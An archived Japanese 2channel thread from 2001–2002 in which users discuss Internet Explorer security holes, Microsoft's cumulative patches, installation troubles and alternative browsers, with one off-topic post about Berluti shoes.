2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

IE5・5と6・0、ネット閲覧ソフトに欠陥

1 :名無し:01/11/13 07:56
クレジットカード番号などの個人情報が漏えいしかねない安全上の欠陥があることが12日、分かった。

http://www.yomiuri.co.jp/04/20011113ic05.htm

2 :名無しさん@お腹いっぱい。:01/11/13 08:13
IEにcookie関連のセキュリティホール
http://pc.2ch.net/test/read.cgi/sec/1005540777/

3 :名無しさん@お腹いっぱい。:01/11/13 13:40
5.01用パッチも作れゴラァァ

4 :名無しさん@お腹いっぱい。:01/11/13 14:17
>>3
超同意。
IE5.01サポート打ち切っちゃったよ。
なに考えてるんだ!!!

5 :名無しさん@お腹いっぱい。:01/11/13 15:49
なんで>>1のリンク先の記事はリンクしないで全角英数なんだろう。

------
> マイクロソフト社は修正プログラムの準備を急ぐ一方、同社HPに臨時対策を掲載している。
> 詳しくはhttp://www.microsoft.com/japanまで。

6 :名無しさん@お腹いっぱい。 :01/11/13 17:19
しっかし穴だらけのソフトだなぁ。

7 :名無しさん@お腹いっぱい。:01/11/13 19:11
>>4
サポート打ち切っちゃったの?
5.01から乗り換えるなら5.5と6.0、どっちがいいかな?

8 ::01/11/13 19:30
>>7
6.0と言いたいところやけど5.5にしとき〜。
6.0は大きく変わるから結構ストレスたまるよ。
あ、sp2忘れず入れとけば完璧や。

9 : :01/11/13 20:13
ときにcookieにたまたまクレジットカード番号が格納
されてて悪意ある奴がうまく誘導してそれを運良く入手し
て不正使用される確立なんて宝くじ一等当選並みの確立だな。
メディアは煽りすぎ。

10 :7:01/11/13 20:23
>>8
ありがとうございます。

11 :名無しさん@お腹いっぱい。:01/11/13 20:28
>>9
SirCamみたいのが出回るとヤバい

12 :名無しさん@お腹いっぱい。:01/11/13 21:03
memoMLの投稿なんだけど5.01はこのプログラム上の欠陥の影響を受けないらしい。

ttp://memo.st.ryukoku.ac.jp/archive/200111.month/1872.html

13 :名無しさん@お腹いっぱい。:01/11/13 21:38
じゃあ5.01SP2のままが一番だな

14 :名無しさん@お腹いっぱい。:01/11/13 22:47
>>13
前門のnimda後門のクッキー穴

15 :名無しさん@お腹いっぱい。:01/11/13 22:49
nimdaはパッチがあるしクッキーは5.01系はもともと影響を受けない

16 :Read 俺 ◆NQknBlFw :01/11/14 01:26
>>15
本当にそうおもってんのか?
ネタだろ?ネタだよな!
ネタって逝ってくれ(w

17 :名無しさん@お腹いっぱい。:01/11/15 09:28
一体、何回パッチあてさせりゃ気が済むんじゃ、ゴラァ

18 :名無しさん@お腹いっぱい。:01/11/15 09:53
最近、ツギハギ当てるのが快感になっちゃったよ。
あっ、さっそく出てる。
SP2用とIE6用のツギハギ・・・

19 :名無しさん@お腹いっぱい。:01/11/15 12:34
5.01sp2も5.5sp2も、ウィルスやトロイを送り込み
実行することができるセキュリティーホールが残ってるから、
6.0にした方がいいんじゃないの?
cookieなんかよりこっちの方が深刻でしょ。

20 :名無しさん@お腹いっぱい。:01/11/15 13:18
まじ?

21 :名無しさん@お腹いっぱい。:01/11/15 13:34
>19
証拠は?
そのソースだせよ!

22 :名無しさん@お腹いっぱい。:01/11/15 13:37
PenTだと6.0は重すぎるのよ。

23 :名無しさん@お腹いっぱい。:01/11/15 13:50
>>19
勘違いしているようだが。
セキュリティホールはセキュリティホール。
どっちがいい悪いじゃないと思うが。
まあ、M$を怨め。

24 :バッチ@お腹いっぱい。:01/11/15 17:09
修正バッチでたよ
http://www.microsoft.com/windows/ie/downloads/critical/q312461/default.asp

25 :バッチ@お腹いっぱい。:01/11/15 17:15
今、WindowsMeのIE6.0なんだけど、WindowsXPを入れたら、
もちろんセキュリティバッチ類また、入れ直しないとダメなんでしょう?

26 : 33333:01/11/15 20:59
http://www.rbbtoday.com/news/20011115/5490.html


ガイシュツですがRBBの記事です

27 :名無しさん@お腹いっぱい。:01/11/16 00:30
http://www.forest.impress.co.jp/article/2001/11/15/ie_cookie.html

同社では、今回のセキュリティ問題の影響テストをIE 5.5 SP2とIE 6のみで
行ったとし、IE 5.5 SP2用とIE 6用の修正プログラムだけを公開している。
現在同社のWebサイトからダウンロードできるIE 5.01 SP2についてはサポートの
対象外とし、影響がでるかどうかは明らかにしていない。

5.01排除の動きだね。
5.5はNIS2002と相性が悪いみたいだから、いずれは6.0に変えるか。

28 :名無しさん@お腹いっぱい。:01/11/16 09:30
>>22
5.5よりマシだと思うけど

29 :名無しさん@お腹いっぱい。:01/11/16 10:15
IE5.5 + SP2 + MS01-055
IE6.0 + MS01-055
いまのところ、こんなけパッチしとけばいいの?

だれか、状況を把握してる人いてたら、教えてください。

30 :名無しさん@お腹いっぱい。:01/11/16 10:45
>19
で、どんな穴よ?

31 :名無しさん@お腹いっぱい。:01/11/16 15:07
>>30
IE5.5sp2でも、Cross Frame securityのバグが1つだけ残ってる。
そのバグとHTMLヘルプを組み合わせれば、何でもできてしまう。

32 :名無しさん@お腹いっぱい。:01/11/16 17:32
>>29
ここ見て。

ttp://www.microsoft.com/japan/enable/products/security/

33 :名無しさん@お腹いっぱい。:01/11/17 23:52
>>32
≠29だが、参考になったよ。

しかし・・OSの方、Win2KのSP2適用済みでもこんなにホールがあるとは・・。
WindowsUpdateには殆ど載ってなかったような気がする。なんだかな〜。

34 :名無しさん@お腹いっぱい。:01/11/18 04:31
IE5.01のサポート打ち切りやがってどうしたらいいんだ( ゚Д゚)ゴルァ!!

35 :名無しさん@お腹いっぱい。:01/11/18 04:57
M$=2世代サポート
M$=3世代太古の遺物

36 :名無しさん@お腹いっぱい。:01/11/20 23:10
マイクロソフト、「ウソでした」
ttp://japan.cnet.com/News/2001/Item/011120-3.html

37 :名無しさんだよもん:01/11/22 17:45
>>36
いや、嘘って言われても…(汗
文句を言う気もしないし、とりあえず「これからは気をつけてください」としか…(w

38 : :01/12/12 20:43

セキュリティの基本はIE,OEを使わないこと
https://www.netsecurity.ne.jp/article/6/3262.html
http://www.zdnet.co.jp/news/bursts/0112/06/02.html

39 :名無しさん@お腹いっぱい。:01/12/12 22:19
なんだよー。また新しいのが出たと思ってビクーリしたよ。

40 :名無しさん@お腹いっぱい。:01/12/12 22:20
何でIE、OEだけ全角なのだ?

41 :名無しさん@お腹いっぱい。:01/12/13 00:03
EXEファイルをTXTファイルと見せかけてダウンロードできるというのは既出?
http://www.solutions.fi/index.cgi/news_2001_11_26?lang=eng

42 :名無しさん@お腹いっぱい。:01/12/13 02:55
>>38
http://headlines.yahoo.co.jp/hl?a=20011119-00000005-vgb-sci
ていうか、何使えばいいんだい?
メールソフトは別として、ネスケも以前(4.5か4.6あたり)バックドアが開くバグがあって
修正パッチが出るのまで何ヶ月もかかったんだよ。
逆に多少の事は問題にならないんでしょうね。おおらかでよい事だ(笑

43 :名無しさん@お腹いっぱい。:01/12/13 09:17
>>42
>ていうか、何使えばいいんだい?

telnet これ最強!(w

44 :名無しさん@お腹いっぱい。:01/12/13 10:07
>>42
Webの主軸はネスケ4.78。
少なくともMicro$oft由来のセキュリティホールの影響は受けない。
問題は一部見れない(表示狂い、または全く表示されない)ページがあること。
Mojira由来のネスケ6.2だと、ActiveXなどMicro$oft固有機能でなければほとんど
表示できるが、相当高速なマシン(1GHz以上)でないと厳しいな。

メーラーはWin95時代から現在まで電信8号使ってる。
もちろんMicro$oft由来のセキュリティホールの影響は受けないし、HTM形式で
送ることがないから相手に迷惑をかけない。
移行はディレクトリごと持っていくだけなので、マシンやディスクを取り替
えるときに簡単に移行できる。

45 :名無しさん@お腹いっぱい。:01/12/13 14:08
>>43

だめだめじゃん!!

46 :名無しさん@お腹いっぱい。:01/12/13 14:12
w3m
simple is best

47 :名無しさん@お腹いっぱい。:01/12/14 21:27
この修正プログラムがマシンにインストールされたことを確認するためには
Internet Explorer を起動し、[ヘルプ] から Internet Explorer の
[バージョン情報] をクリックし、[更新バージョン] フィールドに Q313675
が表示されていることを確認して下さい。

ttp://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS01-058

48 :名無しさん@お腹いっぱい。:01/12/14 23:59
>>47
これは累積って書いてあるから今までの修正パッチ入れてない人はこれだけ入れとけばいいのかな?
とりあえず新しい修正パッチage

49 : :01/12/15 00:25
>>48
そうみたいね。

50 :名無しさん@お腹いっぱい。:01/12/15 07:51
質問なんですがwin2000でIE5.5SP2のネットワークインストールバージョンが落とせないんですがやり方ご存知の方居ますか?

win9x系だと出来るみたいですが当方NT系なのでOS入れ直し時に一々SP2のフルセット落とし直すのが非常に面倒なのですが・・

ご教授下さいませ。

51 :名無しさん@お腹いっぱい。:01/12/15 08:48
>47
またIE5.0が無い...
やっぱVerUPしないとダメなのか...

52 :名無しさん@お腹いっぱい。:01/12/15 16:07
IE6にVerUPすると、IEの上のツールバー?などの上下が出来なくなるんだけど
これって直る?OSは98SE。

53 :名無しさん@お腹いっぱい。:01/12/15 16:10
>>52
表示→ツールバー→ツールバーを固定する
のチェックをはずす。

54 :52:01/12/15 16:40
>>53
ありがとうございます!!感謝、感謝!!

55 :名無しさん@お腹いっぱい。:01/12/19 09:06
こんだけ板のTOPに貼られてるから今更だが一応。
最新の累積修正パッチ。 対応は5.5SP2と6.0のみだ。
http://www.microsoft.com/japan/technet/security/current.asp?url=/japan/technet/security/frame_prekb.asp?sec_cd=MS01-058

更新バージョンに、Q313675 が記述されればOK。

56 :名無しさん@お腹いっぱい。:01/12/19 17:50
累積修正とは言っても、SP2以降の修正だからなんのパッチも当ててない人は
順番で最初っから当てないとダメだぞ。

57 :名無しさん@お腹いっぱい。:01/12/19 18:14
>>56
パッチって他にもあてるのあったっけ?

58 :名無しさん@お腹いっぱい。:01/12/19 18:32
>>50 IEAKという管理者キットを使うとCD-Rに落とせる。
IEAKの対応OSはWin95、98、NT4.0、2000。
http://www.microsoft.com/japan/ieak/downloads/ieak55/
http://www.microsoft.com/japan/technet/prodtechnol/ie/deploy/

59 :名無しさん@お腹いっぱい。:01/12/19 19:03
>>57 IE5.5SP2、6.0に必要なパッチは、
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS01-051
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS01-055
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS01-058

MS製品のパッチは以下のサイトで検索できる。
http://www.microsoft.com/japan/technet/security/current.asp

60 :57:01/12/19 19:57
>>59
3つのアドレスの「修正プログラム」のリンクをクリックすると、
同じアドレスに飛ばされるから
3つ分のパッチが含まれてるってことかな?

61 :初心者:01/12/19 19:57
マイクロソフトセキュリティー情報を読んでも
何のことだか、サッパリわかりません

62 :名無しさん@お腹いっぱい。:01/12/19 19:59
>>61 わかりづらいよねぇ

63 :名無しさん@お腹いっぱい。:01/12/19 20:08
>>60
そうだね、リンクが以前と変わってるね。更新日は古いままだけど
リンクだけ変更しているようだね。
とすると、やはり最新の1つだけでいいということか。
>>62 禿同

64 :名無しさん@お腹いっぱい。:01/12/19 21:52
http://www.microsoft.com/windows/ie/downloads/critical/q313675/default.asp
このサイトに飛んで、日本語で表示できないの俺だけ?

65 :名無しさん@お腹いっぱい。:01/12/19 21:56
>>64
そこは英語のサイトなんだよ・・・

66 :名無しさん@お腹いっぱい。:01/12/19 22:07
>66
warata(藁

67 :名無しさん@お腹いっぱい。:01/12/20 01:03
上げ

68 : :01/12/20 09:44
>>65
英語でも開かない。

69 :名無しさん@お腹いっぱい。:01/12/20 10:08
>>68
どうして?

70 :68:01/12/20 10:19
>>69
http://www.microsoft.com/windows/ie/downloads/critical/q313675/default.asp
何語でGoを押しても「ページが表示できません」となる。

71 :名無しさん@お腹いっぱい。:01/12/20 13:57
すいません。バッチあててから、フリーズしまくりなんですが・・
特に漢字変換の途中でフリーズします。
なぜでしょうか?
修正前は大丈夫だったんですが。

72 :名無しさん@お腹いっぱい。:01/12/20 14:29
>>70
アクセス集中のせいかな、時々止まってるが一応表示できるみたい

73 :名無しさん@お腹いっぱい。:01/12/20 15:05
ちょいテス

74 : :01/12/22 22:17
当方、IE6なんですけど、マイナーバージョンの違いで
パッチ当てられまっせん。詳しい情報希望。
 6.00.24 だと だめとか 対応方法とか
 6.00.26 だと よいとか

75 :ななしさん:01/12/22 22:31
>>61
セキュリティー情報なので、絶対解読できない暗号が
使われているようです。(w

76 :名無しさん@お腹いっぱい。:01/12/22 23:44
>>75
誤訳がけっこうあるのでは?

77 :あけましておめでとう!:02/01/01 00:04
空けましておめでとうございます、今年もインターネットエクスプローラー
並びにWindowsのセキュリティーホール&欠陥をよろしくお願いいたします。

78 :お年玉落としちゃった:02/01/04 06:34
ここで脆弱性が解消されているかチェックしましょう。
かなり便利です。
初心者の方は特にチェックしておきましょう。
http://homepage2.nifty.com/spw/

79 :名無しさん@お腹いっぱい。:02/01/06 19:56
これは脆弱性どころの話じゃないですね。欠陥製品に近いね。
IE5.01SP2のサポートが打ち切られて、いやいや5.5か6.0に入れ替えなきゃと
思っていたのにどんなブラウザーを選んだらいいものやら・・・、はぁ困った。

80 :名無しさん@お腹いっぱい。:02/01/06 19:57
Netscapeはいかがですか?

81 :名無しさん@お腹いっぱい。:02/01/06 20:16
実は一回入れたことがあるんですけど、ネスケ。
えらく起動が重たくて、日本語表示が変になったりしませんか?

82 :名無しさん@お腹いっぱい。:02/01/06 22:01
ネスケってなーんか馴染めない。

83 :名無しさん@お腹いっぱい。:02/01/20 17:43
>>82

でも、良いよ。
4.78使ってます。主にメールの方だけどね。

84 :名無しさん@お腹いっぱい。:02/01/21 14:03
ネスケが重いならOperaにしておけ。

85 :名無しさん@お腹いっぱい。:02/01/21 16:51
>>83
そんな古いの使っててセキュ的に大丈夫?

86 :名無しさん@お腹いっぱい。:02/01/22 00:37
http://comic.2ch.net/test/read.cgi/comic/1010683340/295

今日ここを見た瞬間にエラーが発生して
エラー報告ツールが起動したんですが
なんか情報送るか送らないか言われて一応送ったんですが
後から調べるとレジストリのいくつかの設定も送るとか書いてあったんです。
http://watson.microsoft.com/dw/1041/dcp.asp

通信速度を上げるためにNetTuneというソフトを使ってレジストリを書き換えているんですが
大丈夫でしょうか?
ちなみにMicrosoft Application Error Reportingというツールのようです。

87 :名無しさん@お腹いっぱい。:02/01/22 00:57
>>86
送ったものは戻らない。


88 :名無しさん@お腹いっぱい。:02/01/28 06:33
まさしく

89 :名無しさん@お腹いっぱい。:02/01/28 07:37
>>86
そろそろ黒服の男達が迎えに来る頃だぞ。

90 :名無しさん@お腹いっぱい。:02/01/28 18:13
とりあえず戸締まりしておきます。

91 :5.01sp2でよかったんじゃ:02/01/30 20:21
6.0って履歴が消えない?
マイコンピュータ削除したら他の履歴も全部消えた

92 :名無しさん@お腹いっぱい。:02/01/30 21:05
>>91
マイコンピュータ削除ってどうやんの?

93 :91:02/01/30 23:32
履歴内の一番下にあるやつです
あれを消したら、その日の分の履歴も全部消えた

94 :名無しさん@お腹いっぱい。:02/01/31 16:22
>>91 IE5.5のときからそうだよ。何か都合の悪いサイトの履歴だけ消したら
全部消えることがあるね。バグかなんかと思ってたけどSP2や6.0にしてもなるね。

95 :91:02/02/03 21:27
そういう仕様なんだ(駄目じゃんよ

96 :IEに新たなセキュリティホール:02/02/12 11:42
IE5.01,5.5,6.0に新たな6種類のセキュリティホール。
また、その修正パッチが公表された。
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-005.asp



97 :名無しさん@お腹いっぱい。:02/02/12 11:56
>96
日本語版はまだ?

98 :名無しさん@お腹いっぱい。:02/02/12 12:17
>>97 出てるよ。ダウンロードのページでJapaneseを選択。
http://www.microsoft.com/windows/ie/downloads/critical/q316059/default.asp

99 :641:02/02/12 12:44
http://v4.windowsupdate.microsoft.com/ja/thanks.asp

100 :名無しさん@お腹いっぱい。:02/02/12 13:06
>>97 日本語説明ページ
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS02-005ov.asp

101 :名無しさん@お腹いっぱい。:02/02/12 13:43
>100
上から2つ目の、
Internet Explorer のセキュリティの設定でスクリプトの動作を禁止しているユーザーでも、
スクリプトを動作させることができます。

コレって、HTML+TIME2の事かな。。。。

102 :名無しさん@お腹いっぱい。:02/02/12 14:00
IEって糞ですね

103 :名無しさん@お腹いっぱい。:02/02/12 14:37
>>101
そうだよ(^−^)

104 :名無しさん@Emacs:02/02/12 14:40
念のため確認すると、MS02-005 の修正ってのは「累積的」だから、
MS01-058 を適用してなかった人でも、この修正パッチだけで
OK ってことだよね。

# 更新バージョン: ; Q312461; Q313675; Q316059;

105 :名無しさん@お腹いっぱい。:02/02/12 14:46
Q313675; Q316059これだけでもイイってこと?

106 : :02/02/12 14:47
IE5.01sp2はwin2kだけ?
Mヽ(`Д´)ノ Sヽ(`Д´)ノ 氏ヽ(`Д´)ノ ね。

107 :名無しさん@お腹いっぱい。:02/02/12 16:29
パッチあたんないすけど,,,漏れだけ?
IE5.5 SP2,Win2000 SP2SRP1
「修正プログラムはIE5.5SP2用です」なんて出やがる

108 :名無しさん@お腹いっぱい。:02/02/12 18:21
>>106
でも次の機会にはwin2kの5.01パッチはもう出ないだろう。
佐々と6に変えた方が精神的にいいと思われ。

109 :名無しさん@お腹いっぱい。:02/02/12 22:39
修正パッチいれたらノートンが、メール保護できませんでした。
こんなかんじにでたんだけど同じ人いる?


110 :名無しさん@お腹いっぱい。:02/02/12 22:48
>109
メール保護設定できてるー?確認せれ

111 :名無しさん@お腹いっぱい。:02/02/13 00:05
エラーでまくり。助けてください

112 :名無しさん@お腹いっぱい。:02/02/13 00:33
win98の5.01SP2だからカンケーねぇや!ケッ

113 :名無しさん@お腹いっぱい。:02/02/13 01:05
当方、IE5.01sp2&Win98なんだが、かちゅにしか使ってない。それでも
問題あんのかな?標準ブラウザはMozillaベースのタブブラウザ。

114 :dfsdfdsf:02/02/13 01:07
gnfgffgn

115 :名無しさん@お腹いっぱい。:02/02/13 02:43
Q313675; Q316059

116 :名無しさんに接続中… :02/02/13 04:23
オペラ最強ってことで

117 :名無しさん@お腹いっぱい。:02/02/13 08:47
115と同じなんだけど、これでいいの?

118 :名無しさん@お腹いっぱい。:02/02/13 08:48
購入後、たった1年ちょいで、
更新バージョン:;SP2;Q306121;Q312461;Q313675;Q316059;

なんでこんなにツギハギだらけなんだ...

119 :名無し~3.EXE:02/02/13 14:43
https://www.netsecurity.ne.jp/article/1/3949.html
また、修正パッチが必要になったな

120 :名無しさん@お腹いっぱい。:02/02/13 21:36
>119
>この問題に関して、GFIではマイクロソフトに対し脆弱性を報告。
>その後、マイクロソフトでは、他の5つの脆弱性を含めた累積パッチを11日に公開している。
>今回の累積パッチでは、危険性の高い問題が修正されているので、早急にパッチを導入すべきである。

これって「修正済み」という意味ではないの?

121 :cheshire-cat:02/02/13 22:03
>>119
せっかく今日、全部のパソコンに仕込んだばっかりだったのに(泣

122 :名無しさん@お腹いっぱい。:02/02/14 15:32
IE6ってOutlookEx抜きのインストール、もしくはOeだけのアンインストールできないの?


123 :名無しさん@お腹いっぱい。:02/02/14 22:54
IE5.5だったんだけど、パッチはSP2でなきゃ当たらないらしい。
5.5SP2にするならIE6にしてしまうべきですかね?

124 :名無しさん@お腹いっぱい。:02/02/14 23:19
>>123
おパソのスペック等に相談でしょう。IE6重いって噂聞くし。いや、入れてないから
詳しくは知らないけど、ソフト板とかWin板にIE6トラブル関係のスレが結構ある
から、それ見てみれば?機能の面で現状に満足なら、sp2にするだけで良いと
思うよ。

遂に昨日、Win98での5.01に別れを告げて5.5sp2にした人間のアドバイスです。

125 :名無しさん@お腹いっぱい。:02/02/14 23:35
>>124
なるほど。機能に不満はないので5.5SP2かなあ。
なんかIE6はセキュリティ脆弱だと聞いたので。
読んでみますね。

126 :名無しさん@お腹いっぱい。:02/02/15 00:31
5.5&6だとAAがズレてしまうのだ!
まぁ、それだけの事なんだけど・・・

127 :名無しさん@お腹いっぱい。:02/02/15 01:47
>>126
モナ板のTOPからIE5.5 6 でズレない方法が書いてあるサイトに飛べる

128 :名無しさん@お腹いっぱい。:02/02/15 01:55
MS PゴシックをIE5.5/6で日本語以外にも使えるようにするパッチ
http://www45.tok2.com/home/theta/mushroom/zurenai.html

129 :早くパッチ当てよう!:02/02/15 11:41
IEの新しいセキュリティ・ホールを突くウイルス,情報公開からわずか3日で出現
これ自体の危険度は低いが,より悪質な新種登場の恐れも
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020214/1/


130 :名無しさん@お腹いっぱい。:02/02/15 15:23
age

131 :名無しさん@お腹いっぱい。:02/02/21 11:51
最新修正パッチ適用したIEにクラッシュの危険性
http://www.computerworld.jp/contents/free/200202/20020218ms.html

132 : :02/02/21 12:32
>>131 もう嫌だ・・・。

133 :名無しさん@お腹いっぱい。:02/02/21 12:58
亀レススマソ
>>124 IE6.0はPentiumII233MHz メモリ128MBでもちゃんと動きますよ。
むしろネスケが重くてだめだった。

134 :名無しさん@お腹いっぱい。:02/02/21 13:00
>>131-132 やっぱOperaにするか…

135 :名無しさん@お腹いっぱい。:02/02/21 13:06
>>134
LunaScapeどうよ?

136 :名無しさん@お腹いっぱい。:02/02/21 13:12
マイクロソフト セキュリティ情報一覧で去年の11月12月の修正パッチの方が上に来てるね。
>>131と関係あるのかな。MS01-051を当てさせないために。
http://www.microsoft.com/japan/technet/security/frame_current.asp?sel_id=032&info=13

137 :134:02/02/21 13:25
>>135 Thx! 見てきたよ。良さげなので入れてみるよ。

138 :名無しさん@お腹いっぱい。:02/02/21 14:34
>135
ざっと見た感じ、IEのコンポーネントを使用してるって書いてあるから、
結局M$のパッチあてないと意味ないじゃん
と、思ったんだが...

139 :名無しさん@お腹いっぱい。:02/02/21 16:06
>>136
マイクロソフトセキュリティメールによると
MS01-055とMS01-058が改定されたのは「脆弱性による影響の有無を表す表を追加」
しただけでパッチの内容に変化はない模様。
「この問題に対する修正は MS02-005 で提供されている累積的な修正プログラムに
含まれました。この問題に対する修正プログラムよりも MS02-005 の修正プログラ
ムを適用することをお勧めします。」だとさ。

>>138 そだね。Operaの方がいいかも。

140 :MS02-009:02/02/22 11:46
>>131 の修正パッチでたようです。
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-009.asp

141 :名無しさん@お腹いっぱい。:02/02/22 14:06
ディスクに保存されているファイルを外部から読み取られる可能性
対象となる製品
==============
Microsoft XML Core Services versions 2.6, 3.0, 4.0
以下の製品には、出荷時に問題となるバージョンの XML Core Servicesが、
含まれています。
Microsoft Windows XP
Microsoft Internet Explorer 6
Microsoft SQL Server 2000
http://www.microsoft.com/technet/security/bulletin/ms02-008.asp

142 :名無しさん@お腹いっぱい。:02/02/22 14:08
回避策
======
Windows XP または Internet Explorer 6 をご利用のお客様
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Windows XP または Internet Explorer 6 をご利用のお客様は、"スクリプト
を実行しても安全だとマークされている ActiveX コントロールのスクリプト
の実行"の設定を無効にすることで、Internet Explorer 6 を利用した問題を
回避することが可能です。


143 :名無しさん@お腹いっぱい。:02/02/22 18:17
クッキー、スクリプト、JAVA、ACTIVE-XなんかはDonutP使ってオフにしてるよ。
全てワンボタンでオン・オフできるし、グーグルバー入れなくて済むからビビら無くて済むし。
まあ、それでも当てなきゃいけないバッチはあるんだけどね・・・ウトゥダ。
OperaがもうちょっとマシになったらOperaメインにするんだけどなあ。
Operaファイト!
といいつつIEに慣れきってる俺のカラダ・・・ (w



144 :名無しさん@お腹いっぱい。:02/02/23 00:45
昨日からM$からパッチ情報メールがいっぱい来てるんだけど
どれ当てたらいいんだ?>IE6
あれって昔のセキュホールのメールも一緒に来るからわけ分からなくなる。

145 :名無しさん@お腹いっぱい。:02/02/23 00:55
とりあえず、これからはパッチも人柱報告を待って導入しろ
ということだね

146 :名無しさん@お腹いっぱい。:02/02/23 03:22
>127,128
今更だけどパッチの情報ありがと。
AA自作派だったのに、パッチの存在知らなかった・・・鬱だ。

しかし、2月22日のパッチは5.01もサポートされてるね。
5.01のサポートは一体いつまでだろ?

147 :再掲:02/02/23 13:13
2002 年 2 月 11 日 Internet Explorer の累積的な修正プログラム (MS02-005)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-005

XMLHTTP コントロールにより、ローカル ファイルにアクセスすることができる (MS02-008)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-008

Internet Explorer の不正な VBScript 処理により Web ページがローカル ファイルを読み取る (MS02-009)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-009

148 :名無しさん@お腹いっぱい。:02/02/23 15:09
MS02-009ってWin98のIE5.01用のパッチも出てるんだね。
でも、MS02-005やその一つ前のパッチには、それは無いよね。
まさか後から追加なんかしないだろうし、ワケ分からんな。

149 :名無しさん@お腹いっぱい。:02/02/25 08:59
age

150 :名無しさん@お腹いっぱい。:02/02/25 10:30
IE6用のパッチダウンロードして実行したら
「IE6がインストールされている必要があります」って言われるのはナゼ?
もちろん、IE6つかってるよー。

151 :名無しさん@お腹いっぱい。:02/02/25 10:41
もうやだぁぁぁ!!

152 :名無しさん@お腹いっぱい。:02/02/25 12:38
IE6をRESETするには、そうしたらいいの?
XP Pro使っててちょっとした理由でIE6をデフォに戻したいんだけど

153 :名無しさん@お腹いっぱい。:02/02/25 20:28
パッチ当てたかage

154 :名無しさん@お腹いっぱい。:02/02/25 23:10
3/24(日) ベルルッティのUーチップ・ノルベジアン・クラブライン

今日は、昨日に引き続いて、ベルルッティを履きたくなり、Uーチップをセレクトしました。
こちらは、アレッサンドロと比較すると、見た目にもはっきりとノングノーズでポインティーなシルエットです。
足の中央部分深くの低い位置から始まるU型のステッチが、トゥにむけてキュッと絞られ先端でスクエアに象られていて、一層このポインティーなラストを強調しています。
さらには、アイレットも上部に2つしかなく、いかにもノングノーズなデザインでもあります。
一見奇抜にも見えますが、よく味わうと、メリハリがきいたとても美しくかつ魅惑的な靴なのです。
とにかく、芸術品のような美しい佇まいは、好きになるととことん好きにさせられる魅力を醸し出しています。
かくいう私も、このベルルッティの靴に惚れてしまった1人です。
カーキのパンツとベージュのレーヨンのシャツ、アウターは黒のワックスジャケットに合わせましたが、靴がワンポイントになって、渋くまとまりました。
濃い色めにパティーヌ(色付け)されているので、派手な外見ほどには主張していないように感じました。
(もちろん、かなりの光沢がありますし、普通の靴よりは十分に目立ちますが)
オーソドックスなタイプではなく、いかにもベルルッティらしいロングノーズでポインティーな靴を嗜むには、最適な靴の1つと思います。

家を出る時に足入れをしたらシュッと空気の抜ける音がしてピッタリと足に密着しました。
そして、帰ってきて脱ごうとしたら、伸縮性に富むベネティアンレザーの効果もあって足の上部が貼りついたような感じになって、靴を脱ぐのに一苦労するほどでした。
決してタイトフィットではありませんが、この靴は私の足に合っているようでもあり、履き心地もとてもグッドです。
ゴツい造りのノルベジアン製法の靴ではありますが、ソールも比較的柔らかくて返りもよく、靴を履いていないかのような感覚にすらなるほどです。



155 :名無しさん@お腹いっぱい。:02/02/25 23:15
>>152
あいんして、マイクロソフトからダウンロド

156 :名無しさん@お腹いっぱい。:02/02/26 19:58
IE6の2月24日の修正プログラムが、上手くインストできないです。
修正プログラムをインストして、再起動するとアップグレードに失敗しましたとでます。
再度、MSNで確認するとインストされてない状況です。
駐在解除して、セキリティ中にして、プロクシは使ってないです。
IE6は修復しました、何度やってもダメです。
お願いします、原因はなんでしょう??


157 :名無しさん@お腹いっぱい。:02/02/26 20:15
>>156 2/24の修正プログラムってどれですか? 2/24付けではパッチは出てません。
2/22のMS02-009のことですか?
MS02-009はOSごとに別のパッチになっていますので、お使いのOS(Windows98
とかMe、2000、XPなど)とIE6用であることを確認してください。

158 :152:02/02/26 20:26
すいません、2月14日の、セキュリティのプログラムです。

159 :156:02/02/26 20:27

156でした、たびたびすいません。

160 :名無しさん@お腹いっぱい。:02/02/26 21:03
2/12にリリースされた2/11のMS02-005ですね。
http://www.microsoft.com/windows/ie/downloads/critical/q316059/default.asp
でSelect LanguageのJapaneseを選んでもう一度やってみてください。
「MSNで確認」ていうのがよくわかりませんが…

161 :156:02/02/26 22:00
ありがとうございます、↑のアドレスでインストールしたのですが、再起動して
立ち上げると、やはり「アップグレード更新に失敗しましたwindowsに戻ります」と出ます。
すいませんMSNは、http://windowsupdate.microsoft.com/の事でした。
重要な更新だったので、インストールしても再起動して、失敗しましたとでます?
IE6のファイルが、壊れているのでしょうか?でも修復したんですが…?
原因が解りません?


162 :名無しさん@お腹いっぱい。:02/02/26 22:19
>>161 OSはXPですか?そうなら管理者権限でやってみて。

163 :156:02/02/26 22:22
Meなんですよ〜
IE5.5に戻そうかな?

164 :名無しさん@お腹いっぱい。:02/02/26 22:51
5.5に戻すなら、6.0再インストールでも手間は同じですね。

165 :名無しさん@お腹いっぱい。:02/02/26 22:54
ヘルプのバージョン情報にQ316059が表示されていればパッチは当たっています。
再インストの前に念のため確認してみて。

166 :名無しさん@お腹いっぱい。:02/02/26 22:58
IEの画面表示速度が快適なのでIEが好きなんですけど、
いつまでたっても次から次に穴があき穴が埋まらない。
特に実害があったわけでないけど、嫌気をさして
最近はOPERAをメインに使っています。なれると便利。

IEの設計思想に無理があったのですね。
OSに密着したActiveX、VBSを、プラウザに持ってくると
外部アクセスと内部アクセスで、完全に機能を切り離していくのは難しいそう。


167 :156:02/02/26 23:03
ハイ、Q313675;Q316059となっていますよ。
http://windowsupdate.microsoft.comココで、確認すると
インストールされてない事になっているのですよ?
更新履歴を見ると10回ぐらい、「修正プログラムの完了」と記載されてます。
いいのでしょうか?

168 :cheshire-cat:02/02/26 23:12
>>167
パッチ入れる順番間違えたとか。
IE5.5で昔同じことやった。
